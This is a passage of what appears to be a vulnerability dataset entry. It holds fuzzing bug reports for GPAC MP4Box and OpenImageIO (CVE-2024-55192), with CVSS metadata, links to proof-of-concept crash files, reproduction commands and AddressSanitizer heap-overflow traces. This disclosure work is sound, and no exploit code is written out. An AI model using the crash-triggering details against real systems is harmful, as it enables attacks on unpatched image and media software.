==1963314==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f4f7ad3f484 bp 0x7ffd649eed20 sp 0x7ffd649eebc0 T0)
==1963314==The signal is caused by a READ memory access.
==1963314==Hint: address points to the zero page.
#0 0x7f4f7ad3f484 in isom_cenc_get_sai_by_saiz_saio /gpac/src/isomedia/drm_sample.c:1562:96
#1 0x7f4f7ad3f484 in gf_isom_cenc_get_sample_aux_info /gpac/src/isomedia/drm_sample.c:1672:10
#2 0x7f4f7b8707ed in isor_update_cenc_info /gpac/src/filters/isoffin_read_ch.c:242:7
#3 0x7f4f7b873f00 in isor_reader_get_sample /gpac/src/filters/isoffin_read_ch.c:655:4
#4 0x7f4f7b8662a5 in isoffin_process /gpac/src/filters/isoffin_read.c:1486:5
#5 0x7f4f7b5c57b1 in gf_filter_process_task /gpac/src/filter_core/filter.c:3143:7
#6 0x7f4f7b592191 in gf_fs_thread_proc /gpac/src/filter_core/filter_session.c:2144:3
#7 0x7f4f7b59020d in gf_fs_run /gpac/src/filter_core/filter_session.c:2451:3
#8 0x7f4f7af30bca in gf_dasher_process /gpac/src/media_tools/dash_segmenter.c:1255:6
#9 0x55bd003cea1c in do_dash /gpac/applications/mp4box/mp4box.c:4832:15
#10 0x55bd003bfedf in mp4box_main /gpac/applications/mp4box/mp4box.c:6256:7
#11 0x7f4f79faed8f (/lib/x86_64-linux-gnu/libc.so.6+0x29d8f) (BuildId: a43bfc8428df6623cd498c9c0caeb91aec9be4f9)
#12 0x7f4f79faee3f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x29e3f) (BuildId: a43bfc8428df6623cd498c9c0caeb91aec9be4f9)
#13 0x55bd002e7fe4 in _start (/gpac/bin/gcc/MP4Box+0x85fe4) (BuildId: d351b6e65d0a70b69e40b457b1491e27ba84c191)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /gpac/src/isomedia/drm_sample.c:1562:96 in isom_cenc_get_sai_by_saiz_saio
==1963314==ABORTING
```
### Reproduction
```shell
git clone https://github.com/gpac/gpac.git
cd gpac
git checkout 5d70253
./configure --enable-sanitizer
make -j24
./bin/gcc/MP4Box -dash 1000 -mvex-after-traks -daisy-chain -out /dev/null poc7gpac
```
### PoC
poc7gpac: https://github.com/Frank-Z7/z-vulnerabilitys/blob/main/poc7gpac
### Reference
https://github.com/gpac/gpac
### Environment
```
ubuntu:20.04
gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)
clang version 10.0.0-4ubuntu1
afl-cc++4.09
``` | SEGV at src/isomedia/drm_sample.c:1562:96 in isom_cenc_get_sai_by_saiz_saio in MP4Box | https://api.github.com/repos/gpac/gpac/issues/2987/comments | 1 | 2024-10-07T11:17:35Z | 2024-10-09T11:45:53Z | https://github.com/gpac/gpac/issues/2987 | 2,570,129,601 | 2,987 | 6,516 |
CVE-2024-55192 | 2025-01-23T22:15:14.333 | OpenImageIO v3.1.0.0dev was discovered to contain a heap overflow via the component OpenImageIO_v3_1_0::farmhash::inlined::Fetch64(char const*). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/AcademySoftwareFoundation/OpenImageIO/issues/4550"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openimageio:openimageio:3.1.0.0:dev:*:*:*:*:*:*",
"matchCriteriaId": "7AD65390-203E-40E5-ACA9-2D0C8A0A8613",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/AcademySoftwareFoundation/OpenImageIO/issues/4550 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"AcademySoftwareFoundation",
"OpenImageIO"
] | ### Description
Dear developers,
We discovered a heap overflow bug in src/include/OpenImageIO/detail/farmhash.h while fuzzing iconvert and oiiotool.
The latest version also has this vulnerability.
### Version
```shell
# ./bin/oiiotool --version
3.1.0.0dev
# ./bin/iconvert -v
iconvert: Must have both an input and output filename specified.
iconvert -- copy images with format conversions and other alterations
OpenImageIO 3.1.0.0dev http://www.openimageio.org
```
### PoC
poc1iconvert: https://github.com/Frank-Z7/z-vulnerabilitys/blob/main/poc1iconvert
poc1oiio: https://github.com/Frank-Z7/z-vulnerabilitys/blob/main/poc1oiio
### Reproduction
```shell
git clone https://github.com/AcademySoftwareFoundation/OpenImageIO.git openimageio
cd openimageio
mkdir build1
cd build1
CFLAGS="-g3 -fsanitize=address -O0 -fno-omit-frame-pointer" CXXFLAGS="-g3 -fsanitize=address -O0 -fno-omit-frame-pointer" LDFLAGS="-fsanitize=address" cmake .. -DCMAKE_CXX_STANDARD=17 -DOpenImageIO_BUILD_MISSING_DEPS=all
make -j20
./bin/iconvert -g 1.5 --rotcw poc1iconvert tmp.png
#OR
./bin/oiiotool -i poc1oiio --autoorient -o tmp4.jpg
```
### Address Sanitizer log
```
# ./bin/iconvert -g 1.5 --rotcw poc1iconvert tmp.png
=================================================================
==656651==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61f000015cc8 at pc 0x7f3afa3c0fdd bp 0x7ffc53979250 sp 0x7ffc53979240
READ of size 8 at 0x61f000015cc8 thread T0
#0 0x7f3afa3c0fdc in OpenImageIO_v3_1_0::farmhash::inlined::Fetch64(char const*) /openimageio/src/include/OpenImageIO/detail/farmhash.h:291
#1 0x7f3afa3c0fdc in OpenImageIO_v3_1_0::farmhash::farmhashuo::Hash64WithSeeds(char const*, unsigned long, unsigned long, unsigned long) /openimageio/src/include/OpenImageIO/detail/farmhash.h:791
#2 0x7f3afa5c6c1c in OpenImageIO_v3_1_0::farmhash::farmhashuo::Hash64(char const*, unsigned long) /openimageio/src/include/OpenImageIO/detail/farmhash.h:861
#3 0x7f3afa5c6c1c in OpenImageIO_v3_1_0::farmhash::farmhashxo::Hash64(char const*, unsigned long) /openimageio/src/include/OpenImageIO/detail/farmhash.h:917
#4 0x7f3afa5c6c1c in OpenImageIO_v3_1_0::farmhash::farmhashxo::Hash64(char const*, unsigned long) /openimageio/src/include/OpenImageIO/detail/farmhash.h:903
#5 0x7f3afa5c6c1c in OpenImageIO_v3_1_0::farmhash::inlined::Hash64(char const*, unsigned long) /openimageio/src/include/OpenImageIO/detail/farmhash.h:2084
#6 0x7f3afa5c6c1c in OpenImageIO_v3_1_0::Strutil::strhash64(unsigned long, char const*) /openimageio/src/include/OpenImageIO/strutil.h:377
#7 0x7f3afa5c6c1c in OpenImageIO_v3_1_0::Strutil::strhash64(OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >) /openimageio/src/include/OpenImageIO/strutil.h:399
#8 0x7f3afa5c6c1c in OpenImageIO_v3_1_0::ustring::make_unique(OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >) /openimageio/src/libutil/ustring.cpp:462
#9 0x7f3afb552653 in OpenImageIO_v3_1_0::ustring::ustring(OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >) /openimageio/src/include/OpenImageIO/ustring.h:156
#10 0x7f3afb552653 in OpenImageIO_v3_1_0::ParamValue::ParamValue(OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >) /openimageio/src/include/OpenImageIO/paramlist.h:130
#11 0x7f3afb552653 in void __gnu_cxx::new_allocator<OpenImageIO_v3_1_0::ParamValue>::construct<OpenImageIO_v3_1_0::ParamValue, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >&, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >&>(OpenImageIO_v3_1_0::ParamValue*, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >&, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >&) /usr/include/c++/11/ext/new_allocator.h:162
#12 0x7f3afb552653 in void std::allocator_traits<std::allocator<OpenImageIO_v3_1_0::ParamValue> >::construct<OpenImageIO_v3_1_0::ParamValue, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >&, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >&>(std::allocator<OpenImageIO_v3_1_0::ParamValue>&, OpenImageIO_v3_1_0::ParamValue*, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >&, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >&) /usr/include/c++/11/bits/alloc_traits.h:516
#13 0x7f3afb552653 in OpenImageIO_v3_1_0::ParamValue& std::vector<OpenImageIO_v3_1_0::ParamValue, std::allocator<OpenImageIO_v3_1_0::ParamValue> >::emplace_back<OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >&, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >&>(OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >&, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >&) /usr/include/c++/11/bits/vector.tcc:115
#14 0x7f3afb552653 in OpenImageIO_v3_1_0::ImageSpec::attribute(OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >) /openimageio/src/libOpenImageIO/formatspec.cpp:362
#15 0x7f3afb612613 in OpenImageIO_v3_1_0::decode_icc_profile(OpenImageIO_v3_1_0::span<unsigned char const, 18446744073709551615ul>, OpenImageIO_v3_1_0::ImageSpec&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&) /openimageio/src/libOpenImageIO/icc.cpp:322
#16 0x7f3afbd197eb in OpenImageIO_v3_1_0::JpgInput::read_icc_profile(jpeg_decompress_struct*, OpenImageIO_v3_1_0::ImageSpec&) /openimageio/src/jpeg.imageio/jpeginput.cpp:438
#17 0x7f3afbd21fd3 in OpenImageIO_v3_1_0::JpgInput::open(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, OpenImageIO_v3_1_0::ImageSpec&) /openimageio/src/jpeg.imageio/jpeginput.cpp:363
#18 0x7f3afbd2644c in OpenImageIO_v3_1_0::JpgInput::open(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, OpenImageIO_v3_1_0::ImageSpec&, OpenImageIO_v3_1_0::ImageSpec const&) /openimageio/src/jpeg.imageio/jpeginput.cpp:162
#19 0x7f3afb822740 in OpenImageIO_v3_1_0::ImageInput::create(OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >, bool, OpenImageIO_v3_1_0::ImageSpec const*, OpenImageIO_v3_1_0::Filesystem::IOProxy*, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >) /openimageio/src/libOpenImageIO/imageioplugin.cpp:746
#20 0x7f3afb79e1d4 in OpenImageIO_v3_1_0::ImageInput::open(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, OpenImageIO_v3_1_0::ImageSpec const*, OpenImageIO_v3_1_0::Filesystem::IOProxy*) /openimageio/src/libOpenImageIO/imageinput.cpp:154
#21 0x55fdae61997e in convert_file /openimageio/src/iconvert/iconvert.cpp:333
#22 0x55fdae60880d in main /openimageio/src/iconvert/iconvert.cpp:525
#23 0x7f3af9d8ed8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#24 0x7f3af9d8ee3f in __libc_start_main_impl ../csu/libc-start.c:392
#25 0x55fdae6094b4 in _start (/openimageio/build1/bin/iconvert+0xc4b4)
0x61f000015cc8 is located 0 bytes to the right of 3144-byte region [0x61f000015080,0x61f000015cc8)
allocated by thread T0 here:
#0 0x7f3afe40f1e7 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cpp:99
#1 0x7f3afb8573f7 in __gnu_cxx::new_allocator<unsigned char>::allocate(unsigned long, void const*) /usr/include/c++/11/ext/new_allocator.h:127
#2 0x7f3afb8573f7 in std::allocator_traits<std::allocator<unsigned char> >::allocate(std::allocator<unsigned char>&, unsigned long) /usr/include/c++/11/bits/alloc_traits.h:464
#3 0x7f3afb8573f7 in std::_Vector_base<unsigned char, std::allocator<unsigned char> >::_M_allocate(unsigned long) /usr/include/c++/11/bits/stl_vector.h:346
#4 0x7f3afb8573f7 in std::vector<unsigned char, std::allocator<unsigned char> >::_M_default_append(unsigned long) /usr/include/c++/11/bits/vector.tcc:635
#5 0x7f3afbd19878 in std::vector<unsigned char, std::allocator<unsigned char> >::resize(unsigned long) /usr/include/c++/11/bits/stl_vector.h:940
#6 0x7f3afbd19878 in OpenImageIO_v3_1_0::JpgInput::read_icc_profile(jpeg_decompress_struct*, OpenImageIO_v3_1_0::ImageSpec&) /openimageio/src/jpeg.imageio/jpeginput.cpp:423
#7 0x7f3afbd21fd3 in OpenImageIO_v3_1_0::JpgInput::open(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, OpenImageIO_v3_1_0::ImageSpec&) /openimageio/src/jpeg.imageio/jpeginput.cpp:363
#8 0x7f3afbd2644c in OpenImageIO_v3_1_0::JpgInput::open(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, OpenImageIO_v3_1_0::ImageSpec&, OpenImageIO_v3_1_0::ImageSpec const&) /openimageio/src/jpeg.imageio/jpeginput.cpp:162
#9 0x7f3afb822740 in OpenImageIO_v3_1_0::ImageInput::create(OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >, bool, OpenImageIO_v3_1_0::ImageSpec const*, OpenImageIO_v3_1_0::Filesystem::IOProxy*, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >) /openimageio/src/libOpenImageIO/imageioplugin.cpp:746
#10 0x7f3afb79e1d4 in OpenImageIO_v3_1_0::ImageInput::open(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, OpenImageIO_v3_1_0::ImageSpec const*, OpenImageIO_v3_1_0::Filesystem::IOProxy*) /openimageio/src/libOpenImageIO/imageinput.cpp:154
#11 0x55fdae61997e in convert_file /openimageio/src/iconvert/iconvert.cpp:333
#12 0x55fdae60880d in main /openimageio/src/iconvert/iconvert.cpp:525
#13 0x7f3af9d8ed8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
SUMMARY: AddressSanitizer: heap-buffer-overflow /openimageio/src/include/OpenImageIO/detail/farmhash.h:291 in OpenImageIO_v3_1_0::farmhash::inlined::Fetch64(char const*)
Shadow bytes around the buggy address:
0x0c3e7fffab40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3e7fffab50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3e7fffab60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3e7fffab70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3e7fffab80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c3e7fffab90: 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa
0x0c3e7fffaba0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3e7fffabb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3e7fffabc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3e7fffabd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3e7fffabe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==656651==ABORTING
```
```
#./bin/oiiotool -i poc1oiio --autoorient -o tmp4.jpg
=================================================================
==656739==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61f000006ec8 at pc 0x7fade14affd3 bp 0x7ffe33f034a0 sp 0x7ffe33f03490
READ of size 8 at 0x61f000006ec8 thread T0
#0 0x7fade14affd2 in OpenImageIO_v3_1_0::farmhash::inlined::Fetch64(char const*) /openimageio/src/include/OpenImageIO/detail/farmhash.h:291
#1 0x7fade14affd2 in OpenImageIO_v3_1_0::farmhash::farmhashuo::Hash64WithSeeds(char const*, unsigned long, unsigned long, unsigned long) /openimageio/src/include/OpenImageIO/detail/farmhash.h:792
#2 0x7fade16b5c1c in OpenImageIO_v3_1_0::farmhash::farmhashuo::Hash64(char const*, unsigned long) /openimageio/src/include/OpenImageIO/detail/farmhash.h:861
#3 0x7fade16b5c1c in OpenImageIO_v3_1_0::farmhash::farmhashxo::Hash64(char const*, unsigned long) /openimageio/src/include/OpenImageIO/detail/farmhash.h:917
#4 0x7fade16b5c1c in OpenImageIO_v3_1_0::farmhash::farmhashxo::Hash64(char const*, unsigned long) /openimageio/src/include/OpenImageIO/detail/farmhash.h:903
#5 0x7fade16b5c1c in OpenImageIO_v3_1_0::farmhash::inlined::Hash64(char const*, unsigned long) /openimageio/src/include/OpenImageIO/detail/farmhash.h:2084
#6 0x7fade16b5c1c in OpenImageIO_v3_1_0::Strutil::strhash64(unsigned long, char const*) /openimageio/src/include/OpenImageIO/strutil.h:377
#7 0x7fade16b5c1c in OpenImageIO_v3_1_0::Strutil::strhash64(OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >) /openimageio/src/include/OpenImageIO/strutil.h:399
#8 0x7fade16b5c1c in OpenImageIO_v3_1_0::ustring::make_unique(OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >) /openimageio/src/libutil/ustring.cpp:462
#9 0x7fade2641653 in OpenImageIO_v3_1_0::ustring::ustring(OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >) /openimageio/src/include/OpenImageIO/ustring.h:156
#10 0x7fade2641653 in OpenImageIO_v3_1_0::ParamValue::ParamValue(OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >) /openimageio/src/include/OpenImageIO/paramlist.h:130
#11 0x7fade2641653 in void __gnu_cxx::new_allocator<OpenImageIO_v3_1_0::ParamValue>::construct<OpenImageIO_v3_1_0::ParamValue, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >&, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >&>(OpenImageIO_v3_1_0::ParamValue*, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >&, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >&) /usr/include/c++/11/ext/new_allocator.h:162
#12 0x7fade2641653 in void std::allocator_traits<std::allocator<OpenImageIO_v3_1_0::ParamValue> >::construct<OpenImageIO_v3_1_0::ParamValue, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >&, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >&>(std::allocator<OpenImageIO_v3_1_0::ParamValue>&, OpenImageIO_v3_1_0::ParamValue*, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >&, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >&) /usr/include/c++/11/bits/alloc_traits.h:516
#13 0x7fade2641653 in OpenImageIO_v3_1_0::ParamValue& std::vector<OpenImageIO_v3_1_0::ParamValue, std::allocator<OpenImageIO_v3_1_0::ParamValue> >::emplace_back<OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >&, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >&>(OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >&, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >&) /usr/include/c++/11/bits/vector.tcc:115
#14 0x7fade2641653 in OpenImageIO_v3_1_0::ImageSpec::attribute(OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >) /openimageio/src/libOpenImageIO/formatspec.cpp:362
#15 0x7fade2701a86 in OpenImageIO_v3_1_0::decode_icc_profile(OpenImageIO_v3_1_0::span<unsigned char const, 18446744073709551615ul>, OpenImageIO_v3_1_0::ImageSpec&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&) /openimageio/src/libOpenImageIO/icc.cpp:329
#16 0x7fade2e087eb in OpenImageIO_v3_1_0::JpgInput::read_icc_profile(jpeg_decompress_struct*, OpenImageIO_v3_1_0::ImageSpec&) /openimageio/src/jpeg.imageio/jpeginput.cpp:438
#17 0x7fade2e10fd3 in OpenImageIO_v3_1_0::JpgInput::open(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, OpenImageIO_v3_1_0::ImageSpec&) /openimageio/src/jpeg.imageio/jpeginput.cpp:363
#18 0x7fade2e1544c in OpenImageIO_v3_1_0::JpgInput::open(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, OpenImageIO_v3_1_0::ImageSpec&, OpenImageIO_v3_1_0::ImageSpec const&) /openimageio/src/jpeg.imageio/jpeginput.cpp:162
#19 0x7fade2911740 in OpenImageIO_v3_1_0::ImageInput::create(OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >, bool, OpenImageIO_v3_1_0::ImageSpec const*, OpenImageIO_v3_1_0::Filesystem::IOProxy*, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >) /openimageio/src/libOpenImageIO/imageioplugin.cpp:746
#20 0x7fade2bd24bb in OpenImageIO_v3_1_0::ImageCacheFile::open(OpenImageIO_v3_1_0::ImageCachePerThreadInfo*) /openimageio/src/libtexture/imagecache.cpp:509
#21 0x7fade2be5b5b in OpenImageIO_v3_1_0::ImageCacheImpl::verify_file(OpenImageIO_v3_1_0::ImageCacheFile*, OpenImageIO_v3_1_0::ImageCachePerThreadInfo*, bool) /openimageio/src/libtexture/imagecache.cpp:1341
#22 0x7fade2c07770 in OpenImageIO_v3_1_0::ImageCacheImpl::get_image_info(OpenImageIO_v3_1_0::ImageCacheFile*, OpenImageIO_v3_1_0::ImageCachePerThreadInfo*, int, int, OpenImageIO_v3_1_0::ustring, OpenImageIO_v3_1_0::TypeDesc, void*) /openimageio/src/libtexture/imagecache.cpp:2760
#23 0x7fade2c0ecad in OpenImageIO_v3_1_0::ImageCacheImpl::get_image_info(OpenImageIO_v3_1_0::ustring, int, int, OpenImageIO_v3_1_0::ustring, OpenImageIO_v3_1_0::TypeDesc, void*) /openimageio/src/libtexture/imagecache.cpp:2738
#24 0x7fade2c0ecad in OpenImageIO_v3_1_0::ImageCache::get_image_info(OpenImageIO_v3_1_0::ustring, int, int, OpenImageIO_v3_1_0::ustring, OpenImageIO_v3_1_0::TypeDesc, void*) /openimageio/src/libtexture/imagecache.cpp:4261
#25 0x563dbe959651 in input_file /openimageio/src/oiiotool/oiiotool.cpp:5113
#26 0x563dbea0ff93 in std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>::operator()(OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>) const /usr/include/c++/11/bits/std_function.h:590
#27 0x563dbea0ff93 in OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}::operator()(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>) const /openimageio/src/include/OpenImageIO/argparse.h:536
#28 0x563dbea0ff93 in void std::__invoke_impl<void, OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}&, OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul> >(std::__invoke_other, OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}&, OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>&&) /usr/include/c++/11/bits/invoke.h:61
#29 0x563dbea0ff93 in std::enable_if<is_invocable_r_v<void, OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}&, OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul> >, void>::type std::__invoke_r<void, OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}&, OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul> >(OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}&, OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>&&) /usr/include/c++/11/bits/invoke.h:111
#30 0x563dbea0ff93 in std::_Function_handler<void (OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>), OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}>::_M_invoke(std::_Any_data const&, OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>&&) /usr/include/c++/11/bits/std_function.h:290
#31 0x7fade141b84f in std::function<void (OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>::operator()(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>) const /usr/include/c++/11/bits/std_function.h:590
#32 0x7fade141b84f in OpenImageIO_v3_1_0::ArgParse::Impl::parse_args(int, char const**) /openimageio/src/libutil/argparse.cpp:535
#33 0x7fade141e2db in OpenImageIO_v3_1_0::ArgParse::parse_args(int, char const**) /openimageio/src/libutil/argparse.cpp:429
#34 0x563dbea0101b in OpenImageIO_v3_1_0::OiioTool::Oiiotool::getargs(int, char**) /openimageio/src/oiiotool/oiiotool.cpp:6979
#35 0x563dbe7865a1 in main /openimageio/src/oiiotool/oiiotool.cpp:7338
#36 0x7fade0e7dd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#37 0x7fade0e7de3f in __libc_start_main_impl ../csu/libc-start.c:392
#38 0x563dbe78bb34 in _start (/openimageio/build1/bin/oiiotool+0x89b34)
0x61f000006ec8 is located 0 bytes to the right of 3144-byte region [0x61f000006280,0x61f000006ec8)
allocated by thread T0 here:
#0 0x7fade54fe1e7 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cpp:99
#1 0x7fade29463f7 in __gnu_cxx::new_allocator<unsigned char>::allocate(unsigned long, void const*) /usr/include/c++/11/ext/new_allocator.h:127
#2 0x7fade29463f7 in std::allocator_traits<std::allocator<unsigned char> >::allocate(std::allocator<unsigned char>&, unsigned long) /usr/include/c++/11/bits/alloc_traits.h:464
